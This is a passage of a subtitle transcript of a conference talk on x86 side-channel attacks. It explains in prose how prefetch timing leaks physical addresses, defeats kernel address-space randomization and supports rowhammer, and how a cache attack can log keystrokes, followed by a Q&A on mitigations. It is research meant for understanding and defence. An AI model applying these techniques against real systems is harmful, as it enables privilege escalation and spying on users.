  • 35:05 - 35:09
    to your page table, where you have
    4-kilobyte pages. So it's in the end not
  • 35:09 - 35:14
    that complicated, but it's a bit
    confusing, because you want to know a
  • 35:14 - 35:20
    physical address, so you have to look it
    up somewhere in the, in the main memory
  • 35:20 - 35:25
    with physical addresses to translate your
    virtual addresses. And if you have to go
  • 35:25 - 35:32
    through all those levels, it needs a long
    time, so we can do better than that and
  • 35:32 - 35:39
    that's why Intel introduced additional
    caches, also for all of those levels. So,
  • 35:39 - 35:46
    if you want to translate an address, you
    take a look at the ITLB for instructions,
  • 35:46 - 35:51
    and the data TLB for data. If it's there,
    you can stop, otherwise you go down all
  • 35:51 - 35:59
    those levels and if it's not in any cache
    you have to look it up in the DRAM. In
  • 35:59 - 36:03
    addition, the address space you have is
    shared, because you have, on the one hand,
  • 36:03 - 36:07
    the user memory and, on the other hand,
    you have mapped the kernel for convenience
  • 36:07 - 36:13
    and performance also in the address space.
    And if your user program wants to access
  • 36:13 - 36:18
    some kernel functionality like reading a
    file, it will switch to the kernel memory
  • 36:18 - 36:24
    there's a privilege escalation, and then
    you can read the file, and so on. So,
  • 36:24 - 36:30
    that's it. However, you have drivers in
    the kernel, and if you know the addresses
  • 36:30 - 36:36
    of those drivers, you can do code-reuse
    attacks, and as a countermeasure, they
  • 36:36 - 36:40
    introduced address-space layout
    randomization, also for the kernel.
  • 36:40 - 36:47
    And this means that when you have your
    program running, the kernel is mapped at
  • 36:47 - 36:52
    one address and if you reboot the machine
    it's not on the same address anymore but
  • 36:52 - 36:58
    somewhere else. So if there is a way to
    find out at which address the kernel is
  • 36:58 - 37:04
    loaded, you have circumvented this
    countermeasure and defeated kernel address
  • 37:04 - 37:11
    space layout randomization. So this would
    be nice for some attacks. In addition,
  • 37:11 - 37:17
    there's also the kernel direct physical
    map. And what does this mean? It's
  • 37:17 - 37:23
    implemented on many operating systems like
    OS X, Linux, also on the Xen hypervisor
  • 37:23 - 37:28
    and
    BSD, but not on Windows. But what it means
  • 37:28 - 37:34
    is that the complete physical memory is
    mapped in additionally in the kernel
  • 37:34 - 37:40
    memory at a fixed offset. So, for every
    page that is mapped in the user space,
  • 37:40 - 37:45
    there's something like a twin page in the
    kernel memory, which you can't access
  • 37:45 - 37:50
    because it's in the kernel memory.
    However, we will need it later, because
  • 37:50 - 37:58
    now we go back to prefetch and see what we
    can do with that. So, prefetch is not a
  • 37:58 - 38:04
    usual instruction, because it just tells
    the CPU "I might need that data later on.
  • 38:04 - 38:10
    If you have time, load for me," if not,
    the CPU can ignore it because it's busy
  • 38:10 - 38:16
    with other stuff. So, there's no necessity
    that this instruction is really executed,
  • 38:16 - 38:22
    but most of the time it is. And a nice,
    interesting thing is that it generates no
  • 38:22 - 38:29
    faults, so whatever you pass to this
    instruction, your program won't crash, and
  • 38:29 - 38:34
    it does not check any privileges, so I can
    also pass an kernel address to it and it
  • 38:34 - 38:38
    won't say "No, stop, you accessed an
    address that you are not allowed to
  • 38:38 - 38:46
    access, so I crash," it just continues,
    which is nice.
  • 38:46 - 38:50
    The second interesting thing is that the
    operand is a virtual address, so every
  • 38:50 - 38:56
    time you execute this instruction, the CPU
    has to go and check "OK, what physical
  • 38:56 - 39:00
    address does this virtual address
    correspond to?" So it has to do the lookup
  • 39:00 - 39:06
    with all those tables we've seen earlier,
    and as you probably have guessed already,
  • 39:06 - 39:10
    the execution time varies also for the
    prefetch instruction and we will see later
  • 39:10 - 39:16
    on what we can do with that.
    So, let's get back to the direct physical
  • 39:16 - 39:23
    map. Because we can create an oracle for
    address translation, so we can find out
  • 39:23 - 39:28
    what physical address belongs to the
    virtual address. Because nowadays you
  • 39:28 - 39:32
    don't want that the user to know, because
    you can craft nice rowhammer attacks with
  • 39:32 - 39:38
    that information, and more advanced cache
    attacks, so you restrict this information
  • 39:38 - 39:44
    to the user. But let's check if we find a
    way to still get this information. So, as
  • 39:44 - 39:50
    I've told you earlier, if you have a
    paired page in the user space map,
  • 39:50 - 39:55
    you have the twin page in the kernel
    space, and if it's cached,
  • 39:55 - 39:57
    its cached for both of them again.
  • 39:57 - 40:03
    So, the attack now works as the following:
    From the attacker you flush your user
  • 40:03 - 40:10
    space page, so it's not in the cache for
    the... also for the kernel memory, and
  • 40:10 - 40:16
    then you call prefetch on the address of
    the kernel, because as I told you, you
  • 40:16 - 40:22
    still can do that because it doesn't
    create any faults. So, you tell the CPU
  • 40:22 - 40:28
    "Please load me this data into the cache
    even if I don't have access to this data
  • 40:28 - 40:33
    normally."
    And if we now measure on our user space
  • 40:33 - 40:37
    page the address again, and we measure a
    cache hit, because it has been loaded by
  • 40:37 - 40:43
    the CPU into the cache, we know exactly at
    which position, since we passed the
  • 40:43 - 40:48
    address to the function, this address
    corresponds to. And because this is at a
  • 40:48 - 40:53
    fixed offset, we can just do a simple
    subtraction and know the physical address
  • 40:53 - 40:59
    again. So we have a nice way to find
    physical addresses for virtual addresses.
  • 40:59 - 41:04
    And in practice this looks like this
    following plot. So, it's pretty simple,
  • 41:04 - 41:09
    because we just do this for every address,
    and at some point we measure a cache hit.
  • 41:09 - 41:14
    So, there's a huge difference. And exactly
    at this point we know this physical
  • 41:14 - 41:20
    address corresponds to our virtual
    address. The second thing is that we can
  • 41:20 - 41:27
    exploit the timing differences it needs
    for the prefetch instruction. Because, as
  • 41:27 - 41:32
    I told you, when you go down this cache
    levels, at some point you see "it's here"
  • 41:32 - 41:38
    or "it's not here," so it can abort early.
    And with that we can know exactly
  • 41:38 - 41:42
    when the prefetch
    instruction aborted, and know how the
  • 41:42 - 41:48
    pages are mapped into the address space.
    So, the timing depends on where the
  • 41:48 - 41:57
    translation stops. And using those two
    properties and those information, we can
  • 41:57 - 42:02
    do the following: On the one hand, we can
    build variants of cache attacks. So,
  • 42:02 - 42:07
    instead of Flush+Reload, we can do
    Flush+Prefetch, for instance. We can
  • 42:07 - 42:12
    also use prefetch to mount rowhammer
    attacks on privileged addresses, because
  • 42:12 - 42:18
    it doesn't do any faults when we pass
    those addresses, and it works as well. In
  • 42:18 - 42:23
    addition, we can use it to recover the
    translation levels of a process, which you
  • 42:23 - 42:28
    could do earlier with the page map file,
    but as I told you it's now privileged, so
  • 42:28 - 42:33
    you don't have access to that, and by
    doing that you can bypass address space
  • 42:33 - 42:38
    layout randomization. In addition, as I
    told you, you can translate virtual
  • 42:38 - 42:44
    addresses to physical addresses, which is
    now also privileged with the page map
  • 42:44 - 42:49
    file, and using that it reenables return
    to direct exploits, which have been
  • 42:49 - 42:56
    demonstrated last year. On top of that, we
    can also use this to locate kernel
  • 42:56 - 43:01
    drivers, as I told you. It would be nice
    if we can circumvent KSLR as well, and I
  • 43:01 - 43:08
    will show you now how this is possible.
    So, with the first oracle we find out all
  • 43:08 - 43:15
    the pages that are mapped, and for each of
    those pages, we evict the translation
  • 43:15 - 43:18
    caches, and we can do that by either
    calling sleep,
  • 43:18 - 43:24
    which schedules another program, or access
    just a large memory buffer. Then, we
  • 43:24 - 43:28
    perform a syscall to the driver. So,
    there's code of the driver executed and
  • 43:28 - 43:34
    loaded into the cache, and then we just
    measure the time prefetch takes on this
  • 43:34 - 43:41
    address. And in the end, the fastest
    average access time is the driver page.
  • 43:41 - 43:47
    So, we can mount this attack on Windows 10
    in less than 12 seconds. So, we can defeat
  • 43:47 - 43:52
    KSLR in less than 12 seconds, which is
    very nice. And in practice, the
  • 43:52 - 43:58
    measurements looks like the following: So,
    we have a lot of long measurements, and at
  • 43:58 - 44:05
    some point you have a low one, and you
    know exactly that this driver region and
  • 44:05 - 44:10
    the address the driver is located. And
    you can mount those read to direct
  • 44:10 - 44:16
    attacks again. However, that's not
    everything, because there are more
  • 44:16 - 44:21
    instructions in Intel.
    CM: Yeah, so, the following is not our
  • 44:21 - 44:24
    work, but we thought that would be
    interesting, because it's basically more
  • 44:24 - 44:31
    instructions, more attacks, more fun. So
    there's the RDSEED instruction, and what
  • 44:31 - 44:35
    it does, that is request a random seed to
    the hardware random number generator. So,
  • 44:35 - 44:39
    the thing is that there is a fixed number
    of precomputed random bits, and that takes
  • 44:39 - 44:44
    time to regenerate them. So, as everything
    that takes time, you can create a covert
  • 44:44 - 44:50
    channel with that. There is also FADD and
    FMUL, which are floating point operations.
  • 44:50 - 44:57
    Here, the running time of this instruction
    depends on the operands. Some people
  • 44:57 - 45:02
    managed to bypass Firefox's same origin
    policy with an SVG filter timing attack
  • 45:02 - 45:09
    with that. There's also the JMP
    instructions. So, in modern CPUs you have
  • 45:09 - 45:15
    branch prediction, and branch target
    prediction. With that, it's actually been
  • 45:15 - 45:18
    studied a lot, you can create a covert
    channel. You can do side-channel attacks
  • 45:18 - 45:26
    on crypto. You can also bypass KSLR, and
    finally, there are TSX instructions, which
  • 45:26 - 45:31
    is an extension for hardware transactional
    memory support, which has also been used
  • 45:31 - 45:37
    to bypass KSLR. So, in case you're not
    sure, KSLR is dead. You have lots of
  • 45:37 - 45:46
    different things to read. Okay, so, on the
    conclusion now. So, as you've seen, it's
  • 45:46 - 45:50
    actually more a problem of CPU design,
    than really the instruction sets
  • 45:50 - 45:56
    architecture. The thing is that all these
    issues are really hard to patch. They
  • 45:56 - 46:00
    are all linked to performance
    optimizations, and we are not getting rid
  • 46:00 - 46:04
    of performance optimization. That's
    basically a trade-off between performance
  • 46:04 - 46:12
    and security, and performance seems to
    always win. There has been some
  • 46:12 - 46:21
    propositions to... against cache attacks,
    to... let's say remove the CLFLUSH
  • 46:21 - 46:27
    instructions. The thing is that all these
    quick fix won't work, because we always
  • 46:27 - 46:31
    find new ways to do the same thing without
    these precise instructions and also, we
  • 46:31 - 46:37
    keep finding new instruction that leak
    information. So, it's really, let's say
  • 46:37 - 46:44
    quite a big topic that we have to fix
    this. So, thank you very much for your
  • 46:44 - 46:47
    attention. If you have any questions we'd
    be happy to answer them.
  • 46:47 - 46:53
    applause
  • 46:53 - 47:02
    applause
    Herald: Okay. Thank you very much again
  • 47:02 - 47:07
    for your talk, and now we will have a Q&A,
    and we have, I think, about 15 minutes, so
  • 47:07 - 47:11
    you can start lining up behind the
    microphones. They are in the gangways in
  • 47:11 - 47:18
    the middle. Except, I think that one...
    oh, no, it's back up, so it will work. And
  • 47:18 - 47:22
    while we wait, I think we will take
    questions from our signal angel, if there
  • 47:22 - 47:29
    are any. Okay, there aren't any, so...
    microphone questions. I think, you in
  • 47:29 - 47:33
    front.
    Microphone: Hi. Can you hear me?
  • 47:33 - 47:40
    Herald: Try again.
    Microphone: Okay. Can you hear me now?
  • 47:40 - 47:46
    Okay. Yeah, I'd like to know what exactly
    was your stealthiness metric? Was it that
  • 47:46 - 47:51
    you can't distinguish it from a normal
    process, or...?
  • 47:51 - 47:56
    CM: So...
    Herald: Wait a second. We have still Q&A,
  • 47:56 - 48:00
    so could you quiet down a bit? That would
    be nice.
  • 48:00 - 48:08
    CM: So, the question was about the
    stealthiness metric. Basically, we use the
  • 48:08 - 48:14
    metric with cache misses and cache
    references, normalized by the instructions
  • 48:14 - 48:21
    TLB events, and we
    just found the threshold under which
  • 48:21 - 48:26
    pretty much every benign application was
    below this, and rowhammer and cache
  • 48:26 - 48:31
    attacks were after that. So we fixed the
    threshold, basically.
  • 48:31 - 48:36
    H: That microphone.
    Microphone: Hello. Thanks for your talk.
  • 48:36 - 48:43
    It was great. First question: Did you
    inform Intel before doing this talk?
  • 48:43 - 48:48
    CM: Nope.
    Microphone: Okay. The second question:
  • 48:48 - 48:51
    What's your future plans?
    CM: Sorry?
  • 48:51 - 48:56
    M: What's your future plans?
    CM: Ah, future plans. Well, what I did,
  • 48:56 - 49:01
    that is interesting, is that we keep
    finding these more or less by accident, or
  • 49:01 - 49:06
    manually, so having a good idea of what's
    the attack surface here would be a good
  • 49:06 - 49:10
    thing, and doing that automatically would
    be even better.
  • 49:10 - 49:14
    M: Great, thanks.
    H: Okay, the microphone in the back,
  • 49:14 - 49:19
    over there. The guy in white.
    M: Hi. One question. If you have,
  • 49:19 - 49:24
    like, a demon, that randomly invalidates
    some cache lines, would that be a better
  • 49:24 - 49:31
    countermeasure than disabling the caches?
    ML: What was the question?
  • 49:31 - 49:40
    CM: If invalidating cache lines would be
    better than disabling the whole cache. So,
  • 49:40 - 49:43
    I'm...
    ML: If you know which cache lines have
  • 49:43 - 49:47
    been accessed by the process, you can
    invalidate those cache lines before you
  • 49:47 - 49:53
    swap those processes, but it's also a
    trade-off between performance. Like, you
  • 49:53 - 49:58
    can also, if you switch processes, flush
    the whole cache, and then it's empty, and
  • 49:58 - 50:02
    then you don't see any activity anymore,
    but there's also the trade-off of
  • 50:02 - 50:08
    performance with this.
    M: Okay, maybe a second question. If you,
  • 50:08 - 50:12
    there are some ARM architectures
    that have random cache line invalidations.
  • 50:12 - 50:16
    Did you try those, if you can see a
    [unintelligible] channel there.
  • 50:16 - 50:22
    ML: If they're truly random, but probably
    you just have to make more measurements
  • 50:22 - 50:27
    and more measurements, and then you can
    average out the noise, and then you can do
  • 50:27 - 50:30
    these attacks again. It's like, with prime
    and probe, where you need more
  • 50:30 - 50:34
    measurements, because it's much more
    noisy, so in the end you will just need
  • 50:34 - 50:38
    much more measurements.
    CM: So, on ARM, it's supposed to be pretty
  • 50:38 - 50:43
    random. At least it's in the manual, but
    we actually found nice ways to evict cache
  • 50:43 - 50:47
    lines, that we really wanted to evict, so
    it's not actually that pseudo-random.
  • 50:47 - 50:52
    So, even... let's say, if something is
    truly random, it might be nice, but then
  • 50:52 - 50:57
    it's also quite complicated to implement.
    I mean, you probably don't want a random
  • 50:57 - 51:01
    number generator just for the cache.
    M: Okay. Thanks.
  • 51:01 - 51:06
    H: Okay, and then the three guys here on
    the microphone in the front.
  • 51:06 - 51:13
    M: My question is about a detail with the
    keylogger. You could distinguish between
  • 51:13 - 51:18
    space, backspace and alphabet, which is
    quite interesting. But could you also
  • 51:18 - 51:22
    figure out the specific keys that were
    pressed, and if so, how?
  • 51:22 - 51:26
    ML: Yeah, that depends on the
    implementation of the keyboard. But what
  • 51:26 - 51:29
    we did, we used the Android stock
    keyboard, which is shipped with the
  • 51:29 - 51:35
    Samsung, so it's pre-installed. And if you
    have a table somewhere in your code, which
  • 51:35 - 51:40
    says "Okay, if you press this exact
    location or this image, it's an A or it's
  • 51:40 - 51:44
    an B", then you can also do a more
    sophisticated attack. So, if you find any
  • 51:44 - 51:49
    functions or data in the code, which
    directly tells you "Okay, this is this
  • 51:49 - 51:55
    character," you can also spy on the actual
    key characters on the keyboard.
  • 51:55 - 52:03
    M: Thank you.
    M: Hi. Thank you for your talk. My first
  • 52:03 - 52:09
    question is: What can we actually do now,
    to mitigate this kind of attack? By, for
  • 52:09 - 52:12
    example switching off TSX or using ECC
    RAM.
  • 52:12 - 52:17
    CM: So, I think the very important thing
    to protect would be, like crypto, and the
  • 52:17 - 52:21
    good thing is that today we know how to
    build crypto that is resistant to side-
  • 52:21 - 52:24
    channel attacks. So the good thing would
    be to stop improving implementation that
  • 52:24 - 52:31
    are known to be vulnerable for 10 years.
    Then things like keystrokes is way harder
  • 52:31 - 52:37
    to protect, so let's say crypto is
    manageable; the whole system is clearly
  • 52:37 - 52:41
    another problem. And you can have
    different types of countermeasure on the
  • 52:41 - 52:46
    hardware side but it does would mean that
    Intel an ARM actually want to fix that,
  • 52:46 - 52:49
    and that they know how to fix that. I
    don't even know how to fix that in
  • 52:49 - 52:56
    hardware. Then on the system side, if you
    prevent some kind of memory sharing, you
  • 52:56 - 52:59
    don't have flush involved anymore
    and primum (?) probably is much more
  • 52:59 - 53:05
    noisier, so it would be an improvement.
    M: Thank you.
  • 53:05 - 53:12
    H: Do we have signal angel questions? No.
    OK, then more microphone.
  • 53:12 - 53:17
    M: Hi, thank you. I wanted to ask about
    the way you establish the side-channel
  • 53:17 - 53:23
    between the two processors, because it
    would obviously have to be timed in a way to
  • 53:23 - 53:29
    transmit information between one process
    to the other. Is there anywhere that you
  • 53:29 - 53:33
    documented the whole? You know, it's
    actually almost like the seven layers or
  • 53:33 - 53:37
    something like that. There are any ways
    that you documented that? It would be
  • 53:37 - 53:40
    really interesting to know how it worked.
    ML: You can find this information in the
  • 53:40 - 53:46
    paper because there are several papers on
    covered channels using that, so the NDSS
  • 53:46 - 53:51
    paper is published in February I guess,
    but the Armageddon paper also includes
  • 53:51 - 53:56
    a cover channel, and you can
    find more information about how the
  • 53:56 - 53:59
    packets look like and how the
    synchronization works in the paper.
  • 53:59 - 54:04
    M: Thank you.
    H: One last question?
  • 54:04 - 54:10
    M: Hi! You mentioned that you used Osvik's
    attack for the AES side-channel attack.
  • 54:10 - 54:17
    Did you solve the AES round detection and
    is it different to some scheduler
  • 54:17 - 54:21
    manipulation?
    CM: So on this one I think we only did
  • 54:21 - 54:24
    some synchronous attack, so we already
    knew when
  • 54:24 - 54:28
    the victim is going to be scheduled and
    we didn't have anything to do with
  • 54:28 - 54:33
    schedulers.
    M: Alright, thank you.
  • 54:33 - 54:37
    H: Are there any more questions? No, I
    don't see anyone. Then, thank you very
  • 54:37 - 54:39
    much again to our speakers.
  • 54:39 - 54:42
    applause
  • 54:42 - 54:59
    music
  • 54:59 - 55:06
    subtitles created by c3subtitles.de
    in the year 2020. Join, and help us!
Title:
What could possibly go wrong with (insert x86 instruction here)? (33c3)
Description:

more » « less
Video Language:
English
Duration:
55:06

English subtitles

Revisions